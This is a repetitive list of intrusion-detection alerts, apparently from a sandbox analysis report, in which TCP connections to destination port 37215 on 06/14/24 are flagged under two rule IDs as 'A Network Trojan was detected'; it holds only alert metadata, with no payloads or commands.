                SID:2829579
                Source Port:57316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.947092
                SID:2835222
                Source Port:58136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.027979
                SID:2835222
                Source Port:59234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704997
                SID:2835222
                Source Port:58408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977788
                SID:2835222
                Source Port:39818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640527
                SID:2829579
                Source Port:60762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683508
                SID:2835222
                Source Port:35904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998700
                SID:2829579
                Source Port:49546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027932
                SID:2835222
                Source Port:57710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011457
                SID:2835222
                Source Port:49742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760322
                SID:2835222
                Source Port:43206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725440
                SID:2829579
                Source Port:48740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110656
                SID:2829579
                Source Port:55938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024340
                SID:2835222
                Source Port:59768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942817
                SID:2829579
                Source Port:53210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979168
                SID:2835222
                Source Port:50746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411603
                SID:2829579
                Source Port:41758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688082
                SID:2835222
                Source Port:42294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991763
                SID:2835222
                Source Port:46502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159935
                SID:2835222
                Source Port:42894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675323
                SID:2829579
                Source Port:39346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727041
                SID:2835222
                Source Port:56750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775462
                SID:2829579
                Source Port:52118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790579
                SID:2829579
                Source Port:51182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725588
                SID:2829579
                Source Port:38516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.912782
                SID:2829579
                Source Port:55292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861061
                SID:2835222
                Source Port:40724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805628
                SID:2835222
                Source Port:56554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989821
                SID:2829579
                Source Port:54016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110890
                SID:2829579
                Source Port:50088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737876
                SID:2829579
                Source Port:53692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965761
                SID:2829579
                Source Port:37380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146726
                SID:2829579
                Source Port:60948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968928
                SID:2829579
                Source Port:52488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641859
                SID:2835222
                Source Port:38198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.161634
                SID:2829579
                Source Port:36552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150907
                SID:2835222
                Source Port:36160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804723
                SID:2829579
                Source Port:52914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052881
                SID:2829579
                Source Port:39564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679252
                SID:2829579
                Source Port:58474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779625
                SID:2835222
                Source Port:41100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230485
                SID:2835222
                Source Port:52478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293298
                SID:2835222
                Source Port:55332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.723783
                SID:2829579
                Source Port:44790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011823
                SID:2835222
                Source Port:58024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023680
                SID:2829579
                Source Port:36830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828618
                SID:2829579
                Source Port:48570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149844
                SID:2835222
                Source Port:36802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017549
                SID:2829579
                Source Port:37774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342802
                SID:2829579
                Source Port:52492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421149
                SID:2835222
                Source Port:44906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019851
                SID:2835222
                Source Port:44474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763946
                SID:2835222
                Source Port:53662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200852
                SID:2835222
                Source Port:33582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276750
                SID:2829579
                Source Port:46606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879695
                SID:2829579
                Source Port:48638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027708
                SID:2829579
                Source Port:33040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662156
                SID:2829579
                Source Port:49752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143624
                SID:2835222
                Source Port:33228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340900
                SID:2829579
                Source Port:56602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970623
                SID:2835222
                Source Port:57234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202178
                SID:2829579
                Source Port:35610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618427
                SID:2835222
                Source Port:37756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789533
                SID:2829579
                Source Port:57868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324169
                SID:2829579
                Source Port:41312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365186
                SID:2829579
                Source Port:54972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861027
                SID:2829579
                Source Port:48822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133136
                SID:2835222
                Source Port:49826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084609
                SID:2829579
                Source Port:37766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914626
                SID:2835222
                Source Port:42880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679304
                SID:2829579
                Source Port:38290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110612
                SID:2829579
                Source Port:57634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075019
                SID:2829579
                Source Port:40804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423436
                SID:2835222
                Source Port:34140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367761
                SID:2835222
                Source Port:37996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343749
                SID:2835222
                Source Port:59154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200786
                SID:2835222
                Source Port:47860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717658
                SID:2835222
                Source Port:37142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724756
                SID:2835222
                Source Port:46434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662916
                SID:2829579
                Source Port:56970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641910
                SID:2829579
                Source Port:39608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669991
                SID:2829579
                Source Port:34460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011899
                SID:2829579
                Source Port:45982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275279
                SID:2835222
                Source Port:45474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453508
                SID:2829579
                Source Port:43910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568859
                SID:2829579
                Source Port:37290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132781
                SID:2829579
                Source Port:51640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030486
                SID:2835222
                Source Port:46920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226096
                SID:2835222
                Source Port:41118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011091
                SID:2829579
                Source Port:59402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.027816
                SID:2829579
                Source Port:59178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016877
                SID:2829579
                Source Port:45182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381445
                SID:2835222
                Source Port:44574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340000
                SID:2829579
                Source Port:45508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011582
                SID:2835222
                Source Port:56256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776310
                SID:2829579
                Source Port:35200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762071
                SID:2835222
                Source Port:35644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159983
                SID:2835222
                Source Port:59524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025611
                SID:2829579
                Source Port:34146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849511
                SID:2835222
                Source Port:53542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501389
                SID:2829579
                Source Port:54716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133801
                SID:2829579
                Source Port:51384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668528
                SID:2829579
                Source Port:37650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111593
                SID:2829579
                Source Port:54830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052532
                SID:2829579
                Source Port:33334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422278
                SID:2835222
                Source Port:55976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277267
                SID:2835222
                Source Port:35900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323070
                SID:2835222
                Source Port:39662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013765
                SID:2829579
                Source Port:57924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073997
                SID:2835222
                Source Port:57750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615916
                SID:2835222
                Source Port:60872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614393
                SID:2829579
                Source Port:43178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453619
                SID:2829579
                Source Port:50512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563718
                SID:2829579
                Source Port:52372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934539
                SID:2835222
                Source Port:54772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135133
                SID:2829579
                Source Port:44696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679194
                SID:2835222
                Source Port:43730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808400
                SID:2835222
                Source Port:54866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727217
                SID:2829579
                Source Port:43788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683332
                SID:2829579
                Source Port:41672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677744
                SID:2829579
                Source Port:54664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323919
                SID:2835222
                Source Port:51502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625305
                SID:2835222
                Source Port:48394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471439
                SID:2835222
                Source Port:36602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765649
                SID:2835222
                Source Port:45456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291253
                SID:2835222
                Source Port:56304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148399
                SID:2835222
                Source Port:56352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165088
                SID:2835222
                Source Port:54004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010485
                SID:2835222
                Source Port:36686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019359
                SID:2829579
                Source Port:35068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024869
                SID:2835222
                Source Port:42844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545113
                SID:2835222
                Source Port:49058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182194
                SID:2829579
                Source Port:43884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146557
                SID:2829579
                Source Port:50826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056659
                SID:2835222
                Source Port:37356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051871
                SID:2835222
                Source Port:55978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763074
                SID:2835222
                Source Port:52064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669352
                SID:2829579
                Source Port:56398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989461
                SID:2829579
                Source Port:35924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.902023
                SID:2829579
                Source Port:53826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977925
                SID:2835222
                Source Port:38068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054037
                SID:2835222
                Source Port:46846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761323
                SID:2829579
                Source Port:40414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366806
                SID:2835222
                Source Port:57448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737633
                SID:2829579
                Source Port:37412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858038
                SID:2829579
                Source Port:59976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367456
                SID:2835222
                Source Port:44426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519183
                SID:2835222
                Source Port:59432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685022
                SID:2829579
                Source Port:45944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675375
                SID:2829579
                Source Port:55032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977279
                SID:2829579
                Source Port:40540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472285
                SID:2829579
                Source Port:60048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.161605
                SID:2829579
                Source Port:60892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763491
                SID:2829579
                Source Port:60276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322246
                SID:2835222
                Source Port:37684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776365
                SID:2829579
                Source Port:49312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778073
                SID:2829579
                Source Port:34750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225967
                SID:2835222
                Source Port:45108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861768
                SID:2829579
                Source Port:42926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828446
                SID:2829579
                Source Port:45980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.079299
                SID:2835222
                Source Port:52280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503569
                SID:2829579
                Source Port:42138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133932
                SID:2835222
                Source Port:38782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084546
                SID:2835222
                Source Port:42192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.473472
                SID:2829579
                Source Port:45068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548978
                SID:2829579
                Source Port:45262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678980
                SID:2829579
                Source Port:36912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014623
                SID:2829579
                Source Port:47032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471970
                SID:2835222
                Source Port:48778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.912717
                SID:2829579
                Source Port:36898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941844
                SID:2835222
                Source Port:59682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019150
                SID:2829579
                Source Port:35610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660742
                SID:2835222
                Source Port:36432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849984
                SID:2829579
                Source Port:40760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544518
                SID:2829579
                Source Port:47810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181805
                SID:2835222
                Source Port:55130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149280
                SID:2835222
                Source Port:40736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226563
                SID:2829579
                Source Port:44482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502350
                SID:2835222
                Source Port:46172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.516921
                SID:2829579
                Source Port:44820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667935
                SID:2829579
                Source Port:57912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453866
                SID:2835222
                Source Port:36816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082214
                SID:2829579
                Source Port:36770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968720
                SID:2835222
                Source Port:41760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419728
                SID:2835222
                Source Port:53022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702948
                SID:2835222
                Source Port:33044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732547
                SID:2835222
                Source Port:55106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726421
                SID:2829579
                Source Port:33086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146794
                SID:2835222
                Source Port:60250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367824
                SID:2829579
                Source Port:52964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763245
                SID:2829579
                Source Port:52834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146231
                SID:2835222
                Source Port:60254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644624
                SID:2829579
                Source Port:50800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.405883
                SID:2835222
                Source Port:54718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997041
                SID:2829579
                Source Port:36692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977159
                SID:2829579
                Source Port:42984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051608
                SID:2829579
                Source Port:46558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663014
                SID:2835222
                Source Port:48158
                Destination Port:37215
